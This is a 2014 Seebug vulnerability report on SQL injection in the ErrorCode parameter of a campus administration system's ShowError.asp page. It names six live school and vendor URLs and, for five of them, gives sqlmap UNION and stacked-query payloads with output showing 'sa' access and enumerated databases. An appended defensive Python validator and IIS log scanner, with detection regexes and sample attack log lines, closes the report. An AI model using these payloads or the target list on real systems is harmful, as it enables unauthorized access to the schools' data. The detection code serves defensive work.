SQL injection in a widely deployed campus administration system (某通用型校园校务系统)

2014-11-07T00:00:00
ID SSV:95861
Type seebug
Reporter Root
Modified 2014-11-07T00:00:00

Description

Brief description:

boom!!!

Details:

Vendor: Nanjing Suyaxing Information Technology Development Co., Ltd. (南京苏亚星资讯科技开发有限公司). In the vendor's campus administration system, entering any username and password and clicking Login redirects to an error page; the URL of that error page carries an injectable parameter.

Screenshot q.png: https://images.seebug.org/upload/201411/06190159494857e32890d12ae95b7f671eb6b8d4.png

Screenshot w.png: https://images.seebug.org/upload/201411/06190248c033c64239ec6053498f0f409de7785e.png

Instances found through a search engine are listed below. The ErrorCode parameter of ShowError.asp is injectable:

http://www.sdwhys.com/SM2005/public/asp/ErrorMsg/ShowError.asp?ErrorCode=30004
http://www.zjnksyzx.com:8801/SM2005/public/asp/ErrorMsg/ShowError.asp?ErrorCode=30004
http://www.lcxyz.com:21245/SM2005/public/asp/ErrorMsg/ShowError.asp?ErrorCode=30004
http://www.suyaxing.com:81/SM2005/public/asp/ErrorMsg/ShowError.asp?ErrorCode=30004
http://www.hwsyxx.com/SM2005/public/asp/ErrorMsg/ShowError.asp?ErrorCode=30004
http://www.dlwsxx.com/SM2005/public/asp/ErrorMsg/ShowError.asp?ErrorCode=30004

The first five were verified, which confirms the flaw is generic to the product rather than one deployment; every one of them runs the database connection as sa.

1. www.sdwhys.com

Place: GET
Parameter: ErrorCode
Type: UNION query
Title: Generic UNION query (NULL) - 1 column
Payload: ErrorCode=-9683' UNION ALL SELECT CHAR(58)+CHAR(103)+CHAR(100)+CHAR(120)+CHAR(58)+CHAR(110)+CHAR(108)+CHAR(114)+CHAR(115)+CHAR(109)+CHAR(65)+CHAR(122)+CHAR(76)+CHAR(75)+CHAR(119)+CHAR(58)+CHAR(103)+CHAR(98)+CHAR(111)+CHAR(58)--

Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: ErrorCode=30004'; WAITFOR DELAY '0:0:5';--

[16:24:17] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2000
[16:24:17] [INFO] fetching current user
[16:24:22] [INFO] heuristics detected web page charset 'ascii'
[16:24:22] [WARNING] reflective value(s) found and filtering out
current user: 'sa'
[16:24:22] [INFO] fetching current database
current database: 'SM2005'
[16:24:27] [INFO] fetching database names
[16:24:31] [INFO] the SQL query used returns 14 entries
[16:24:36] [INFO] retrieved: "aaa"
[16:24:41] [INFO] retrieved: "Jupiter5"
[16:24:45] [INFO] retrieved: "master"
[16:24:50] [INFO] retrieved: "Merak"
[16:24:54] [INFO] retrieved: "model"
[16:24:59] [INFO] retrieved: "msdb"
[16:25:04] [INFO] retrieved: "Northwind"
[16:25:08] [INFO] retrieved: "pubs"
[16:25:13] [INFO] retrieved: "SM2005"
[16:25:17] [INFO] retrieved: "SRP2003"
[16:25:43] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
[16:25:52] [INFO] retrieved: "tempdb"
[16:25:57] [INFO] retrieved: "vc2003"
[16:26:02] [INFO] retrieved: "Vod2005"
[16:26:15] [INFO] retrieved: "ws2004"
available databases [14]:
[*] aaa
[*] Jupiter5
[*] master
[*] Merak
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] SM2005
[*] SRP2003
[*] tempdb
[*] vc2003
[*] Vod2005
[*] ws2004

[16:26:15] [WARNING] cannot properly display Unicode characters inside Windows OS command prompt (http://bugs.python.org/issue1602). All unhandled occurances will result in replacement with '?' character. Please, find proper character representation inside corresponding output files.
[16:26:15] [INFO] fetched data logged to text files under 'D:\PROGRA~1\???~1\???~1.COM\TOOls\????\SQLMAP~1\Bin\output\www.sdwhys.com'

2. www.zjnksyzx.com

Place: GET
Parameter: ErrorCode
Type: UNION query
Title: Generic UNION query (NULL) - 1 column
Payload: ErrorCode=-1530' UNION ALL SELECT CHAR(58)+CHAR(100)+CHAR(113)+CHAR(120)+CHAR(58)+CHAR(90)+CHAR(67)+CHAR(101)+CHAR(106)+CHAR(80)+CHAR(78)+CHAR(75)+CHAR(82)+CHAR(103)+CHAR(97)+CHAR(58)+CHAR(106)+CHAR(121)+CHAR(99)+CHAR(58)--

Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: ErrorCode=30004'; WAITFOR DELAY '0:0:5';--

[16:45:10] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, ASP
back-end DBMS: Microsoft SQL Server 2000
[16:45:10] [INFO] fetching current user
[16:45:15] [INFO] heuristics detected web page charset 'ascii'
[16:45:15] [WARNING] reflective value(s) found and filtering out
current user: 'sa'
[16:45:15] [INFO] fetching current database
current database: 'SM2005'
[16:45:19] [INFO] fetching database names
[16:45:24] [INFO] the SQL query used returns 13 entries
[16:45:29] [INFO] retrieved: "Jupiter5"
[16:45:33] [INFO] retrieved: "master"
[16:45:38] [INFO] retrieved: "Merak"
[16:45:43] [INFO] retrieved: "model"
[16:45:47] [INFO] retrieved: "msdb"
[16:45:52] [INFO] retrieved: "Northwind"
[16:45:57] [INFO] retrieved: "pubs"
[16:46:02] [INFO] retrieved: "SM2005"
[16:46:06] [INFO] retrieved: "SRP2003"
[16:46:11] [INFO] retrieved: "tempdb"
[16:46:15] [INFO] retrieved: "TempJupiterSa"
[16:46:20] [INFO] retrieved: "Vod2005"
[16:46:25] [INFO] retrieved: "ws2004"
available databases [13]:
[*] Jupiter5
[*] master
[*] Merak
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] SM2005
[*] SRP2003
[*] tempdb
[*] TempJupiterSa
[*] Vod2005
[*] ws2004

[16:46:25] [WARNING] cannot properly display Unicode characters inside Windows OS command prompt (http://bugs.python.org/issue1602). All unhandled occurances will result in replacement with '?' character. Please, find proper character representation inside corresponding output files.
[16:46:25] [INFO] fetched data logged to text files under 'D:\PROGRA~1\???~1\???~1.COM\TOOls\????\SQLMAP~1\Bin\output\www.zjnksyzx.com'

3. www.lcxyz.com

Place: GET
Parameter: ErrorCode
Type: UNION query
Title: Generic UNION query (NULL) - 1 column
Payload: ErrorCode=-6910' UNION ALL SELECT CHAR(58)+CHAR(105)+CHAR(103)+CHAR(118)+CHAR(58)+CHAR(79)+CHAR(68)+CHAR(67)+CHAR(82)+CHAR(109)+CHAR(66)+CHAR(67)+CHAR(76)+CHAR(116)+CHAR(66)+CHAR(58)+CHAR(121)+CHAR(104)+CHAR(97)+CHAR(58)--

Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: ErrorCode=30004'; WAITFOR DELAY '0:0:5';--

[16:39:13] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows Vista
web application technology: ASP.NET, ASP, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2005
[16:39:13] [INFO] fetching current user
[16:39:14] [INFO] heuristics detected web page charset 'ascii'
[16:39:14] [WARNING] reflective value(s) found and filtering out
current user: 'sa'
[16:39:14] [INFO] fetching current database
current database: 'SM2005'
[16:39:14] [INFO] fetching database names
[16:39:14] [INFO] the SQL query used returns 13 entries
[16:39:14] [INFO] retrieved: "Jupiter5"
[16:39:14] [INFO] retrieved: "master"
[16:39:15] [INFO] retrieved: "Merak"
[16:39:15] [INFO] retrieved: "model"
[16:39:15] [INFO] retrieved: "msdb"
[16:39:15] [INFO] retrieved: "ReportServer"
[16:39:15] [INFO] retrieved: "ReportServerTempDB"
[16:39:16] [INFO] retrieved: "SM2005"
[16:39:16] [INFO] retrieved: "SRP2003"
[16:39:16] [INFO] retrieved: "tempdb"
[16:39:16] [INFO] retrieved: "vc2003"
[16:39:16] [INFO] retrieved: "Vod2005"
[16:39:17] [INFO] retrieved: "ws2004"
available databases [13]:
[*] Jupiter5
[*] master
[*] Merak
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] SM2005
[*] SRP2003
[*] tempdb
[*] vc2003
[*] Vod2005
[*] ws2004

[16:39:17] [WARNING] cannot properly display Unicode characters inside Windows OS command prompt (http://bugs.python.org/issue1602). All unhandled occurances will result in replacement with '?' character. Please, find proper character representation inside corresponding output files.
[16:39:17] [INFO] fetched data logged to text files under 'D:\PROGRA~1\???~1\???~1.COM\TOOls\????\SQLMAP~1\Bin\output\www.lcxyz.com'

4. www.suyaxing.com

Place: GET
Parameter: ErrorCode
Type: UNION query
Title: Generic UNION query (NULL) - 1 column
Payload: ErrorCode=-1507' UNION ALL SELECT CHAR(58)+CHAR(116)+CHAR(97)+CHAR(104)+CHAR(58)+CHAR(108)+CHAR(79)+CHAR(121)+CHAR(98)+CHAR(82)+CHAR(103)+CHAR(119)+CHAR(86)+CHAR(105)+CHAR(107)+CHAR(58)+CHAR(120)+CHAR(115)+CHAR(99)+CHAR(58)--

Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: ErrorCode=30004'; WAITFOR DELAY '0:0:5';--

[16:45:31] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2000
[16:45:31] [INFO] fetching current user
[16:45:36] [INFO] heuristics detected web page charset 'ascii'
[16:45:36] [WARNING] reflective value(s) found and filtering out
current user: 'sa'
[16:45:36] [INFO] fetching current database
current database: 'SM2005'
[16:45:40] [INFO] fetching database names
[16:45:45] [INFO] the SQL query used returns 23 entries
[16:45:49] [INFO] retrieved: "Jupiter5"
[16:45:54] [INFO] retrieved: "master"
[16:45:59] [INFO] retrieved: "Merak"
[16:46:03] [INFO] retrieved: "model"
[16:46:08] [INFO] retrieved: "msdb"
[16:46:12] [INFO] retrieved: "Northwind"
[16:46:17] [INFO] retrieved: "pubs"
[16:46:21] [INFO] retrieved: "Sco_CRM"
[16:46:26] [INFO] retrieved: "Sco_CSM"
[16:46:30] [INFO] retrieved: "Sco_Document"
[16:46:35] [INFO] retrieved: "Sco_Financial"
[16:46:39] [INFO] retrieved: "Sco_Inventory"
[16:46:44] [INFO] retrieved: "Sco_Personnel"
[16:46:49] [INFO] retrieved: "Sco_Platform"
[16:46:53] [INFO] retrieved: "Sco_Portal"
[16:46:58] [INFO] retrieved: "SM2005"
[16:47:02] [INFO] retrieved: "SRP2003"
[16:47:07] [INFO] retrieved: "tempdb"
[16:47:11] [INFO] retrieved: "TempJupiterSa"
[16:47:16] [INFO] retrieved: "test"
[16:47:20] [INFO] retrieved: "vc2003"
[16:47:25] [INFO] retrieved: "web"
[16:47:29] [INFO] retrieved: "ws2004"
available databases [23]:
[*] Jupiter5
[*] master
[*] Merak
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] Sco_CRM
[*] Sco_CSM
[*] Sco_Document
[*] Sco_Financial
[*] Sco_Inventory
[*] Sco_Personnel
[*] Sco_Platform
[*] Sco_Portal
[*] SM2005
[*] SRP2003
[*] tempdb
[*] TempJupiterSa
[*] test
[*] vc2003
[*] web
[*] ws2004

[16:47:30] [WARNING] cannot properly display Unicode characters inside Windows OS command prompt (http://bugs.python.org/issue1602). All unhandled occurances will result in replacement with '?' character. Please, find proper character representation inside corresponding output files.
[16:47:30] [INFO] fetched data logged to text files under 'D:\PROGRA~1\???~1\???~1.COM\TOOls\????\SQLMAP~1\Bin\output\www.suyaxing.com'

5. www.hwsyxx.com

Place: GET
Parameter: ErrorCode
Type: UNION query
Title: Generic UNION query (NULL) - 1 column
Payload: ErrorCode=-3029' UNION ALL SELECT CHAR(58)+CHAR(98)+CHAR(113)+CHAR(105)+CHAR(58)+CHAR(67)+CHAR(108)+CHAR(88)+CHAR(80)+CHAR(100)+CHAR(71)+CHAR(88)+CHAR(66)+CHAR(69)+CHAR(116)+CHAR(58)+CHAR(102)+CHAR(106)+CHAR(122)+CHAR(58)--

Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: ErrorCode=30004'; WAITFOR DELAY '0:0:5';--

[17:41:19] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2000
[17:41:19] [INFO] fetching current user
[17:41:24] [INFO] heuristics detected web page charset 'ascii'
[17:41:24] [WARNING] reflective value(s) found and filtering out
current user: 'sa'
[17:41:24] [INFO] fetching current database
current database: 'SM2005'
[17:41:29] [INFO] fetching database names
[17:41:33] [INFO] the SQL query used returns 13 entries
[17:41:38] [INFO] retrieved: "Jupiter5"
[17:41:42] [INFO] retrieved: "master"
[17:41:47] [INFO] retrieved: "Merak"
[17:41:52] [INFO] retrieved: "model"
[17:41:56] [INFO] retrieved: "msdb"
[17:42:01] [INFO] retrieved: "Northwind"
[17:42:06] [INFO] retrieved: "pubs"
[17:42:10] [INFO] retrieved: "SM2005"
[17:42:15] [INFO] retrieved: "SRP2003"
[17:42:19] [INFO] retrieved: "tempdb"
[17:42:24] [INFO] retrieved: "vc2003"
[17:42:29] [INFO] retrieved: "Vod2005"
[17:42:33] [INFO] retrieved: "ws2004"
available databases [13]:
[*] Jupiter5
[*] master
[*] Merak
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] SM2005
[*] SRP2003
[*] tempdb
[*] vc2003
[*] Vod2005
[*] ws2004

[17:42:33] [WARNING] cannot properly display Unicode characters inside Windows OS command prompt (http://bugs.python.org/issue1602). All unhandled occurances will result in replacement with '?' character. Please, find proper character representation inside corresponding output files.
[17:42:33] [INFO] fetched data logged to text files under 'D:\PROGRA~1\???~1\???~1.COM\TOOls\????\SQLMAP~1\Bin\output\www.hwsyxx.com'
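The sqlmap output above shows the two payload shapes the ErrorCode parameter accepts (a quote-terminated UNION SELECT built from CHAR() concatenation, and a stacked WAITFOR DELAY), and that ErrorCode is only ever a plain error number in legitimate use. The following is an added example written for this entry; it is not code from the advisory, from sqlmap, or from the vendor's product. It does two defender-side things: a whitelist validator that accepts only an integer ErrorCode (the server-side fix), and a scanner that runs over IIS W3C log lines and flags requests to ShowError.asp whose ErrorCode fails that validation, tagging which payload shape matched. The log lines, IP addresses and user agents are constructed for the example; the field layout assumed is the default IIS W3C Extended order.

```python
"""Input validation and IIS log detection for the ShowError.asp?ErrorCode injection.

Added example, not part of the Seebug entry or the vendor's code. The log
lines below are constructed; the field order assumed is the default IIS
W3C Extended format:
  date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
"""
import re
from urllib.parse import unquote_plus

# Signatures derived from the payload shapes in the sqlmap output above.
SIGNATURES = {
    "quote_break": re.compile(r"'"),
    "union_select": re.compile(r"\bUNION\b.*\bSELECT\b", re.I | re.S),
    "char_concat": re.compile(r"CHAR\(\d+\)\s*\+\s*CHAR\(\d+\)", re.I),
    "time_delay": re.compile(r"\bWAITFOR\s+DELAY\b", re.I),
    "stacked": re.compile(r";\s*\w"),
}

# Legitimate ErrorCode values are short positive integers (30004 in the report).
ERROR_CODE_RE = re.compile(r"\d{1,6}")


def is_valid_error_code(raw):
    """Whitelist validator: return the integer error code, or None to reject.
    This is the server-side fix: the value never reaches SQL as text."""
    if raw is None or not ERROR_CODE_RE.fullmatch(raw):
        return None
    return int(raw)


def query_param(query, name):
    """Fetch one parameter from a raw cs-uri-query without splitting on ';',
    so stacked-query payloads are seen whole. Returns None if absent."""
    for pair in query.split("&"):
        key, _, val = pair.partition("=")
        if unquote_plus(key) == name:
            return unquote_plus(val)
    return None


def classify_value(value):
    """Return the names of the payload signatures present in an ErrorCode value."""
    return [name for name, rx in SIGNATURES.items() if rx.search(value)]


def scan_iis_log(lines):
    """Yield an alert for every ShowError.asp request whose ErrorCode is not a plain integer."""
    for line in lines:
        if line.startswith("#") or not line.strip():
            continue  # directive or blank line
        fields = line.split()
        if len(fields) < 11:
            continue  # not a full W3C record in the assumed layout
        date, time_, _sip, _method, stem, query, _port, _user, client_ip, agent, status = fields[:11]
        if not stem.lower().endswith("/showerror.asp"):
            continue
        value = query_param("" if query == "-" else query, "ErrorCode")
        if value is None or is_valid_error_code(value) is not None:
            continue  # absent or well-formed: nothing to report
        yield {
            "time": f"{date} {time_}",
            "client": client_ip,
            "agent": agent,
            "status": status,
            "value": value,
            "signatures": classify_value(value),
        }


# Constructed sample: one benign request, two shaped like the advisory's payloads, one unrelated.
SAMPLE_LOG = """#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
2014-11-06 16:24:17 10.0.0.5 GET /SM2005/public/asp/ErrorMsg/ShowError.asp ErrorCode=30004 80 - 198.51.100.7 Mozilla/5.0 200
2014-11-06 16:24:18 10.0.0.5 GET /SM2005/public/asp/ErrorMsg/ShowError.asp ErrorCode=-9683'%20UNION%20ALL%20SELECT%20CHAR(58)%2BCHAR(103)%2BCHAR(58)-- 80 - 198.51.100.7 sqlmap/1.0 500
2014-11-06 16:24:22 10.0.0.5 GET /SM2005/public/asp/ErrorMsg/ShowError.asp ErrorCode=30004';%20WAITFOR%20DELAY%20'0:0:5';-- 80 - 198.51.100.7 sqlmap/1.0 200
2014-11-06 16:24:30 10.0.0.5 GET /SM2005/public/asp/Login.asp user=x 80 - 203.0.113.9 Mozilla/5.0 200
"""


def scan_sample():
    """Run the scanner over the constructed sample and return the alerts as a list."""
    return list(scan_iis_log(SAMPLE_LOG.splitlines()))


if __name__ == "__main__":
    for alert in scan_sample():
        print(f"{alert['time']} {alert['client']} {alert['agent']} "
              f"status={alert['status']} signatures={alert['signatures']} value={alert['value']!r}")
```

The scanner treats any non-integer ErrorCode as an alert and uses the signatures only to label it, so an encoded or slightly altered payload that escapes every regex is still reported; the validator is what belongs in the ASP page itself, and the same rule (parse to an integer, then bind it as a parameter) removes the stacked-query and UNION vectors together.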

Proof of vulnerability:

Already demonstrated above.